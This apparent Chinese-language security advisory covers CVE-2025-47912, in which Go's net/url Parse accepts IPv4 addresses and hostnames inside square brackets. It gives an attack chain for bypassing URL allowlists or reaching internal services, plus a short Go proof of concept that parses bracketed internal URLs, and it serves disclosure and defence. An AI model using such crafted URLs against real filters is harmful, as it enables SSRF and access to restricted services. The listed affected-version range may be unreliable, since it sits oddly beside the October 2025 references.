CVE-2025-47912 Go语言net/url Parse函数IPv6地址验证缺陷

漏洞信息

漏洞编号

CVE-2025-47912

漏洞类型

输入验证绕过

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Go (golang.org)

漏洞概述

CVE-2025-47912是Go语言标准库net/url包中的一个安全漏洞。该漏洞存在于URL解析函数Parse中，攻击者可利用RFC 3986规范的实现缺陷，在URL的主机组件中注入非IPv6地址内容。根据RFC 3986标准，IPv6地址应使用方括号包裹，例如http://[::1]/，但IPv4地址和主机名不得使用方括号格式。然而Go的Parse函数未能正确实施这一限制，导致允许任意值出现在方括号内。此漏洞可能影响依赖URL解析进行安全决策的应用程序，如URL白名单验证、重定向处理、代理服务等场景。攻击者可通过构造特殊的恶意URL绕过安全检查，执行未授权操作或访问受限资源。

技术细节

该漏洞源于Go语言net/url包的Parse函数对RFC 3986规范的实现不完整。RFC 3986明确规定，主机组件中的方括号仅用于包裹IPv6地址，IPv4地址和普通主机名必须直接书写不得使用方括号。然而Parse函数在解析URL时，未正确验证方括号内的内容是否属于有效的IPv6地址格式。攻击者可构造形如http://[192.168.1.1]/或http://[example.com]/的URL，这类URL在RFC规范中属于非法格式，但Go的解析器会错误地接受并处理。由于Go被广泛应用于服务器端开发、云原生应用和网络工具中，此漏洞可能影响大量依赖URL解析进行安全验证的系统。攻击者可能利用此漏洞绕过URL过滤机制、进行钓鱼攻击或访问内部服务。

攻击链分析

STEP 1

步骤1

攻击者识别目标应用程序中依赖Go net/url.Parse进行URL验证的组件

STEP 2

步骤2

攻击者构造恶意URL，将IPv4地址或内部主机名包装在方括号中，如http://[192.168.1.1]/

STEP 3

步骤3

Go的Parse函数错误地接受该非法格式URL，提取出的Host值为[192.168.1.1]

STEP 4

步骤4

如果目标应用存在URL白名单检查或IP过滤逻辑，恶意URL可能绕过验证

STEP 5

步骤5

攻击者成功访问内部服务、绕过安全限制或执行未授权操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

package main

import (
    "fmt"
    "net/url"
)

func main() {
    // PoC: IPv4 address in square brackets (RFC violation)
    maliciousURLs := []string{
        "http://[192.168.1.1]/admin",
        "http://[10.0.0.1]:8080/login",
        "http://[example.com]/phishing",
        "http://[internal.corp]/secret",
    }

    fmt.Println("=== CVE-2025-47912 PoC ===")
    fmt.Println("Go Parse function accepts non-IPv6 values in square brackets")
    fmt.Println()

    for _, rawURL := range maliciousURLs {
        parsed, err := url.Parse(rawURL)
        if err != nil {
            fmt.Printf("Parse Error for %s: %v\n", rawURL, err)
            continue
        }
        fmt.Printf("Input:  %s\n", rawURL)
        fmt.Printf("Host:   %s\n", parsed.Host)
        fmt.Printf("Path:   %s\n", parsed.Path)
        fmt.Printf("Scheme: %s\n", parsed.Scheme)
        fmt.Println("---")
    }

    fmt.Println("\nThese URLs violate RFC 3986 but are incorrectly accepted.")
    fmt.Println("IPv4 addresses and hostnames must NOT be in square brackets.")
}

/*
Vulnerability Explanation:
- RFC 3986 Section 3.2.2 states that IPv6 addresses are the ONLY valid
  content for square brackets in the host component.
- Go's url.Parse() fails to enforce this restriction.
- Attackers can craft malicious URLs to bypass security checks.

Impact:
- URL whitelist bypass
- Security filter evasion
- Potential SSRF in vulnerable applications
*/

影响范围

Go < 1.22.11

Go < 1.23.5

防御指南

临时缓解措施

在官方补丁发布前，可通过在应用代码中增加URL格式验证来缓解风险：检查解析后的URL的Host字段，如果包含方括号，验证其内容是否符合IPv6地址格式（RFC 5952）。同时限制HTTP客户端跟随重定向到非预期域名。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-47912
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-47912
3 Details https://www.cvedetails.com/cve/CVE-2025-47912/
4 VulDB https://vuldb.com/cve/CVE-2025-47912
5 Link https://go.dev/cl/709857
6 Link https://go.dev/issue/75678
7 Link https://groups.google.com/g/golang-announce/c/4Emdl2iQ_bI
8 Link https://pkg.go.dev/vuln/GO-2025-4010
9 Link http://www.openwall.com/lists/oss-security/2025/10/08/1